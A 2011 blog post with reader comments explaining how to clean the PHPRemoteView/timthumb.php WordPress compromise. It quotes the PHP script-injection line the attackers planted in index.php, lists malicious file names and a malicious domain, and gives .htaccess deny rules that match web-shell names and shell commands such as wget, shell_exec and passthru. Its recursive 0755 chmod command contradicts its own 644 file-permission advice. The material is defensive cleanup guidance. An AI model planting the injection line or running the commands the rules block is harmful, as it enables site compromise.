PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011 by

(image courtesy

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo '<script type="text/javascript" language="javascript" src="'.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from

Then remove six (check back often) phony files added by the hackers (back up first, in case your installation actually requires these files):


Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run this bash command to set the correct permissions recursively for your WordPress installation:

chmod -R 0755 /wordpressdirectory

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from
deny from
allow from all

The malicious script was run from (UPDATE: has popped up) and I had run a traceroute on the domains, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220 and 91.196) and they would receive a forbidden notice if they tried to access TechSpheria again.

Benoist Rousseau posted additional .htaccess security; use at your own risk:

RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) – [F]

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

Added /wp-content/udp.php to the list of malicious files.

/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

Added 91.196 to the deny IP list since has popped up.

  • bill ballad

    I had the same thing hit my site yesterday, you may have missed a file look for udp.php in wp-content its a remote file upload script

    • Dennis Fan

      Yes, thanks. I was unaware of its presence.

      And I was hit by it yesterday as well, only got around to writing about it today.
      —– Reply message —–

    • Dennis Fan

      Do you know if they collect usernames and passwords sent through their script?
      —– Reply message —–

      • debajyoti banerjee

        Better to change your mySQL database password and all other associated passwords. I have faced similar phpRemoteview attack while using “IGIT related post with thumb image after post” plugin which uses old ‘timthumb.php’ file vulnerable to this attack. 

        • Dennis Fan

          Thank you. I already changed most of my significant passwords.

        • Andrew Wells Douglass

          I’m thinking IGIT is the culprit, too. Sent a note to the author. Version 3.9.7

          Any suggestions for alternative plugins? :)

      • bill ballad

        Looks like thsi was just phase one, right now i think they are just collecting attack metrics, phase two will bring exploit packages if you didn’t clean your site. I think phase one was an automated worm.

        • Dennis Fan

          Thank you for sharing your thoughts. Mind if I include that in the article later? (with credit, of course)

  • Pingback: Ci hanno infettato il sito! | La Baia()

  • Pingback: Wordpress Website Hacked with RemoteViewPHP()

  • dirk_s

    udp.php is also changed / added in /wp-admin/

    • Dennis Fan

      Thank you for that information. I will update the post now.

  • dirk_s

    Quadro is a theme, that uses the timthumb.php …

  • Pingback: How to Check for PHP Remote View Hack | Empirical Integrated Marketing()

  • Paul

    Thank you so much for the comprehensive fix. Do we need to remove timthumb.php? Is there an update available?

    • Dennis Fan

      Yes, there is an update available, no need to remove it.

      Sent from my HTC

      —– Reply message —–

  • Tina

    You’ve saved my life – thank you so much!

  • Steve519

    There were also two files that were uploaded to the upload folder.  I forgot the names but they had either feed or rss in the title.  Both within an hour of the other files being uploaded.

    • Dennis Fan

      /wp-content/feed-file.php and /wp-content/feed-files.php. Thank you. Added to the list, much appreciated!

  • Beau Brooke

    I believe my site is infected by this too. I’ve checked my index.php but I dont have the script above. I did however have some of the additional malicious files. Where should I be looking?

    I have updated my timthumb.php and removed what I can but I need to make sure it’s 100% removed.

  • Beau Brooke

    Ignore me, I assumed this guide meant the index.php within the theme folder. I’ve found it now.

  • Tina

    I just found yet another file wp-content/78d69f40906679a976dc4d45cebffbe6.php

  • Pingback: Removing PHPRemoteView hack attack from your Wordpress()

  • Nayith

    Question! I Had wp-admin/upd.php instead of udp.php I delete it, was this incorrect?

    • Dennis Fan

      I’m sorry, I’m not understanding what you’re saying.

      Sent from my HTC

      —– Reply message —–

      • Nayith

        In my directory, I was not able to find (as mentioned above)



        Instead, they were called /wp-admin/UPD.php (The difference is just the letters order). Do you think it will affect my website?

        • Dennis Fan

          Check the contents of the file. I doubt its legitimacy, however, make sure. If there are no comments indicating WordPress or a plugin, it’s probably malicious.

          • Nayith

            Thanks A lot for your help, really appreciated!!

          • Nayith

            As you said, they are illegitimate!

  • Admin

    there’s also a temp direcetory inside your theme template delete that as well

  • KillerSneak

    Sorry for the double post, the temp directory also hosts an altered .htaccess and the 78d69f40906679a976dc4d45cebffbe6.php numeric php files along with some fake index and other files just delete the whole temp directory/folder

  • rachelhonoway

    Thanks for the help – MUCH appreciated! (BTW – We use the magnificent theme as well)

  • Owen Christopher Wolter

    THANKS so much for this. became infected, I don’t know when the last time was that I updated timthumb

    Also, a recent ping of returns 91.196.XXX.XXX

    So in my htaccess I now have:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from
    allow from all

  • carley

    Another big thankyou for the post! Damn hackers!

  • Zack Proser

    Much appreciated!

  • Pingback: phpRemoteView Attack: Vulnerabilità in WordPress()

  • Matt C

    Awesome post. Just saved my ass. Thank you.

  • Adamfrm

    thank you very much for this useful article I also have received such a problem and I’ve run the appropriate command above article, but I do not find the file: / wp-content/uploads/feed-file.php / wp-content/uploads/feed-files.php if you can help me?

    • Dennis Fan

      If those files are not there, you SHOULD be fine.

    • Anonymous

      I had the same issue with this hack, but thanks to this post I saved my websites. Adamfrm I couldn’t find /feed-files.php and /feed-file.php either, but when I checked my sites on it didn’t showed me that the sites were infected. Cause before that I had checked them and it had shown me that my sites had been infected.

  • Nwill36

    Very useful information, 1 of my sites had been hacked, also got through crawltrack,
    Thanks for your quick help I have secured other sites using wordpress

  • LloydChiro

    Thanks for this. I had SOME of those files in my site, but not all. 

    I’m wondering if I need to wipe my site on my host and start clean, or will this be a permanent fix?

    • Dennis Fan

      You SHOULD be fine.

      Sent from my HTC

      —– Reply message —–

  • LloydChiro

    Oh, and I can’t figure out how I got this. Anybody know how this shows up?

    • Dennis Fan

      timthumb.php had a security exploit and that was used to infect your site.
      Sent from my HTC

      —– Reply message —–

      • LloydChiro

        Thanks. I actually just updated my tomthumb.php file. The theme that I’m using is using version 1.4, and the latest version is up to 2.7. I would have never thought to update this on my own, as it’s not a plugin that I see on my dashboard. 

  • Chris Miller

    Thanks for your help with this! Saved a site for us tonight! 

  • Andrew Wells Douglass

    I should have also said THANK YOU THANK YOU THANK YOU for a timely and lucid explanation of this problem. I suspect others are more grateful than it might seem. It’s like, if your doctor tells you that you have cancer, your first instinct may not be to send her a fruit basket….

  • Pre_existance

    THANK YOU SO MUCH FOR THIS….i’ve spent all day trying to figure this out and wasn’t understanding anything i was reading on other sites. This made perfect sense and actually WORKED!!! hoorah!!

  • Pingback: Seu wordpress pode estar sendo hackeado pelo Superuperdomain: TimThumb e PHP Remote View Hack | [ Ferramentas Blog ]()

  • Pingback: eBabble - Technology » TimThumb Vulnerability()

  • Lauro Faria

    Apart from these files, also found: / wp-content/e334….php / wp-config.php / index.php Who had injected code.Lauro

  • OceansDB

    My blog got hacked too. I filed a complaint at’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended :)

  • Pingback: Falha de segurança no Timthumb - BDI BBS()

  • Seb


    thanks for this great post. I got hacked by this crap as well. I deleted the files you mentioned above but I can’t finde “the base code”.

    First, in your WordPress’s index.php, remove the following script added by the hack:echo ”;I can’t find this on my index.php. Do you have another idea?Regards

    • Dennis Fan

      Does your index.php look like a normal WordPress index?

      • Seb

        That is how it looks like

        But if I check the sourcecode at I can see the script.

        • Dennis Fan

          Clear any caching plugin you might have installed.

          • Seb

            Don’t have a caching plugin installed :-/

            • Dennis Fan

              Oh… Check the blog header file then? Maybe the hackers have evolved…

              • Seb

                Thanks a bunch for your quick answers, Dennis. I searched index.php, header and footer for “superpuperdomain” but I can’t find anything. It’s weird.

                • Dennis Fan

                  Try clearing your cache?

                  • Seb

                    Done. Still in the sourcecode. 


                • Dennis Fan

                  *Your browser cache.

        • Dennis Fan

          Hello, I just checked your site’s source and did not manage to find superpuperdomain…

          • Seb

            Chrome shows it and a huge malware warning pops up if you try to reach the site :-/

            • Dennis Fan

              I have no idea what could be causing this, I suggest you wait for a day, and see if it is still there. If so, there are more extreme ways of fixing this.

  • Pingback: Malware Attacke | FOTOPRESSO()

  • Beej

    I have the same thing as site’s source code: has this  on line 669. I dont know how to change it.

    • beej


      • Robbie

        how did you fix it?

  • Pingback: Webseite gehackt. Kontrolliert eure Wordpress Installation. : swblog()

  • Pixel2Pixel Design

    Refer this article it is a good one to remove this virus

  • Blaise

    thanks. Really. You save my blog

  • Gautam

    I’ve removed the code from wp-config.php and also deleted the upd.php file from wp-content. But still, when I browse any site, it seems to crash the whole server. I have 4 WP sites running under 3 users on a Dreamhsot VPS – I’ve cleaned them all against codes, timthumb (it is there on one site, but that is the latest version with allow external deactivated), files etc. and also added the htaccess codes (both of those in the same file, above the domain directory).

  • KillerSneak

    Anybody having issues with “” my site has been flagged by Chrome now and it leads to the same:
    Welcome to nginx! that the timthumb hack had? Can someone help me as I can’t find where it’s coming from

  • Pingback: Hacked And Had | Micah()

  • JustMe

    I cleared one of my site’s from this hack, but now my other site got hacked too. Not by but….

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?
    Could you please check this out techspheria? Maybe you will find a solution, before all the wordpress installations got this issue….

  • JustMe

    Found it, my .htacces file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.phpDeleted my .htaccess file and maked a new one.These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t reconize.

  • Pingback: Drabbad av Pharma Hack… @ Who Cut The Cheeze()

  • Deirdorf

    Thanks for the help!!! 

    I would have found this post sooner if it had shown up in initial search for “Exploit:JS/Timbum.B” 

    It would help if you added Exploit:JS/Timbum.B since that is how the is malware is referenced.  

  • Justin Wheeler

    Thanks very much!